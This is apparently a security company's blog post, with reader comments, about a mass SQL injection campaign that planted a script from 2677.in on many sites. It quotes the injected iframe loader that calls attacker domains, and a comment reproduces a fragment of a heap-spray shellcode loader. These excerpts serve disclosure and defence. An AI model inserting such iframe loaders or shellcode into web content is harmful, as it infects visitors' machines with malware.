A large number of sites have been hacked again in the last few hours with a malware script pointing to http://2677.in/yahoo.js . Not only small sites, but some big ones got hit as well. It is the same SQL injection attack as used in the robint-us mass infection of a few days ago.
Some of the sites hacked this time:
http://www.ameristar.com/
http://www.servicewomen.org
http://www.chicagopublicradio.org
http://www.industryweek.com
http://www.booksellerandpublisher.com.au
http://www.spain-holiday.com
This time Google says that around 1 thousand pages have been infected. This is the content of the yahoo.js script:
try{__m}catch(e){__m=1;document.title=document.title.replace(/<(w|W)*> /,””);document.write(“< iframe src=http://2677.in/cnzz.html width=0 height==>
<iframe src=http://2677.in/ie.html width=22 height=1
So it loads malware from http://2677.in/ie.html, which then calls http://s11.cnzz.com to load the virus. This is the output of our scan agaisnt ameristar.com:
What is funny is that one of the top pages that got hacked was https://www.idera.com and their seminar about “Understanding SQL Server Security Options”. Just search on Google for “”http://2677.in/yahoo.js” inurl:.idera.com” to see it.
If your site is hacked (or contains malware), and you need help, send us an email at support@sucuri.net or visit our site: Sucuri Security. We can get your sites clean up right away.
Also, consider checking out our site security monitoring. We will monitor your sites 24×7 and alert you if it ever gets infected with malware, hacked or blacklisted.
Don't forget it's pulling of ie.html as well which seems to be attempting shellcode and also embeds a hidden anhey.swf.
From the 'sun' div:
"""
….
var a = new Array();
var xcode=loader("log.txt","MM","NN")*262144;
var shellcode=loader("log.txt","XX","YY");
var ls = xcode-(shellcode.length*2 0x01020);
var b = loader("log.txt","VV","WW");
while(b.length<ls)
{
b =b;
}
var lh=b.substring(0,ls/2);
delete b;
lh = lh shellcode;
….
"""
anhey.swf is caught by 2 antivirus packages as a generic trojan: https://www.virustotal.com/analisis/725f0cc85e341… …
Had the registrar suspend the domain name ~ 5 hrs ago.
This is exactly why sites that force javascript on visitors is exactly the wrong thing to do.
When online banking users are forced to adopt loose security settings to do the simplest of tasks, then eventually they become the default, and that’s when things go wrong.
Security conscious sites should *not* let their developers run amok demanding ever greater browser permissions. Instead, they should be looking at opportunities to work with less browser permissions.
Since the Idera pages are httpS, they will pass right through any firewalls, proxy servers and unified threat management gateways that do not perform man-in-the-middle SSL interception. That leaves just the desktop AV to defend corporate networks and we all know how weak of a defense they are.
found a new website that appears to host the same script;
4589DOTin/yahoo.js
What is the 3rd party app installed that is vulnerable to SQL injection? That is, what vulnerability in the sites is allowing malicious users to inject the malware to begin with?